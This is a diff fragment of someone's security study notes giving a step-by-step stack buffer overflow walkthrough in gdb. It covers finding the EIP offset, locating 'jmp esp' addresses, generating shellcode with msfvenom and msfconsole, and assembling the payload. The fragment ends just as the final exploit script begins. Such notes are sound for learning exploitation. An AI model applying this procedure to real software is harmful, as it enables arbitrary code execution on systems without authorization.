usmcsolis/COSC/Security.md

 print(buffer)
 ```

-  		- Using gdb use run <<<$(./bufferoverflow.py) to change the buffer size and get a feel for the size of the buffer
+	-Using gdb use run <<<$(./bufferoverflow.py) to change the buffer size and get a feel for the size of the buffer
     	- Wiremask.eu -> Tools -> BufferOverflowPatternGenerator -> Copy the 200 byte pattern and paste it as the "buffer" variable
       	- run <<<$(./bufferoverflow.py)
 		- COPY HEX VALUE FROM THE EIP and paste it inside Wiremask.eu --> BufferOverflowPatternGenerator to find the OFFSET
    		- Once OFFSET is found adjust the buffer variable to match the value (62)
       		- Now we create a "eip" variable set to "BBBB"
 	 	- Change Print line to print(buffer+eip)
 		- When we run the run <<<$(./bufferoverflow.py) with the changes we can verify if BBBB is written into the EIP register
    		- Open new window and Open GDB inside a clean environment with "env -gdb ./func"
       		- "show env" will show us env variables and we will unset ALL values using "unset env {VARIABLE}"
 	 	- NORMAL GDB ASSEMBLY LOCATIONS inside (gdb) "run" to see memory location
     		- NORMAL GDB run "info proc map" and COPY the START of next memory address down from the [HEAP] and the END of [STACK] Line
        		- PASTE noth  into your python script as "find /b {address1}, {address2}, 0xff, 0xe4" COPY THIS AND PASTE IN NORMAL GDB
 	  	- PASTE INTO NORMAL GDB "find /b 0xf7de1000, 0xffffe000, 0xff, 0xe4" and grab the FIRST 4 addresses as these are the first jump esp locations
      		- PASTE the 4 locations into your SCRIPT THEN BREAK INTO BYTES AND FLIP
 					- 0xf7de3b59 --> 0xf7 de 3b 59 --> "\x59\x3b\xde\xf7" FINAL
      					- 0xf7f588ab --> 0xf7 f5 88 ab --> "\xab\x88\xf5\xf7" FINAL
 					- 0xf7f645fb --> 0xf7 f6 45 fb --> "\xfb\x45\xf6\xf7" FINAL
      					- 0xf7f6460f --> 0xf7 f6 64 0f --> "\x0f\x64\xf6\xf7" FINAL
 	  	- QUIT NORMAL GDB using "quit"
      		- Now we can Generate SHELL CODE using MSFVENOM / MSFCONSOLE
 		- MSFVENOM (Creating shell code)
    				- msfvenom --list payloads
 				- msfvenom -p linux/x86/exec CMD=whoami -b '\x00' -f python
     		-MSFCONSOLE
        				- msfdb init
 	   			- msfconsole
        				- use payload/linux/x86/exec
 	   			- show options
        				- set CMD whoami
 	   			- generate -b '\x00' -f python
     		- COPY FIRST JMP LOCATION \x59\x3b\xde\xf7 and insert it in your "eip" variable as (eip = "\x59\x3b\xde\xf7")
        		- CREATE a (nop = "\x90" * 15) Variable
 	  	- COPY and paste your msfvenom output into script
 	  	- CHANGE PRINT to "print(buffer+eip+nop+buf)"
      		- run <<<$(./bufferoverflow.py) with saved changes if it doesnt work we have to REGENERATE SHELL CODE from MSFCONSOLE/VENOM
 		- BELOW has the final script and exploit used
 ```
 #!/usr/bin/env python